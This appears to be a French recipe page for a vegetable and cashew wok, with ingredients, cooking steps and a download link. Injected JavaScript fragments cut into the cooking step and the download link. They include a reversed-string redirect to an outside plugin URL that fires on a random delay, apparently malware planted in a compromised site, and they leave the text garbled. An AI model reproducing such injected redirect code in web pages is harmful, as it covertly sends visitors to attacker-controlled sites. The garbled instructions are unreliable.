WOK DE LÉGUMES AUX NOIX DE CAJOU

WOK DE LÉGUMES AUX NOIX DE CAJOU

Pour 4 Pers.

INGRÉDIENTS :

– 1 petite tête de brocoli
– 4 carottes
– 1courgettes
– 1 grosse poignée de germes de soja
– 1 petit sachet de pousses d’épinards
– poignée de noix de cajou
– quelques feuilles de coriandre (fraîches ou surgelées)
– 2 CS de sauce soja
– 2 CS de sauce soja épaisse sucrée
– 1 CS du huile de sésame
– 1 gousse d’ail émincé
– sel et poivre
facultatif : piment frais pour décorer

Éplucher les carottes, couper le brocoli en petites fleurettes et émincer la courgette.


Réduire ses légumes pendant 6 minutes au micro-ondes avec un fond d’eau et du sel.


Dans un wok, faire chauffer huile et cuire rapidement.


Rajouter toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les légumes (cuits et crus), les sauces, les noix, et cuire rapidement l’ensemble.

NB : Ce plat peut être servi tel quel ou accompagné d’un riz au jasmin.

Wok de légumestoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton” download>Télécharger

Leave comments

Your email is safe with us.

Ce site est protégé par reCAPTCHA et le GooglePolitique de confidentialité etConditions d'utilisation appliquer.